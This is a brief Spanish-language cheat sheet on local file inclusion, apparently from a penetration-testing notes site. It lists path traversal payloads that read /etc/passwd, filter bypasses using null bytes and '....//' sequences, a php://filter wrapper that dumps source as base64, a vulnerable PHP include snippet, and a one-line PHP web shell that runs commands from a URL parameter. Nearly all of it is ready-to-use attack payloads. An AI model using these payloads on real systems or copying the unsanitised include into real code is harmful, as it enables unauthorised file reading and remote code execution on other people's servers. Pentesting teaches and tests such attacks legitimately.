📂LFI

Parámetro que veo, parámetro que testeo

http://url/index.php?lang=../../../../../../etc/passwd

http://url/index.php?lang=....//....//....//....//etc/passwd

Bypassing Filtros:

Checkea el filtro:

<?PHP
    include ("languages/".$_GET['lang']);
?>

languages/../../../../etc/passwd # En este caso pide incluir 'languages'

/?parametro=/etc/passwd%00
/?parametro=/etc/passwd%2500

/?parametro=php://filter/read=convert.base64-encode/resource=<payload>

-------------------------------------------------------------------------------------

<?php system($_GET['cmd']);?>

Última actualización hace 2 años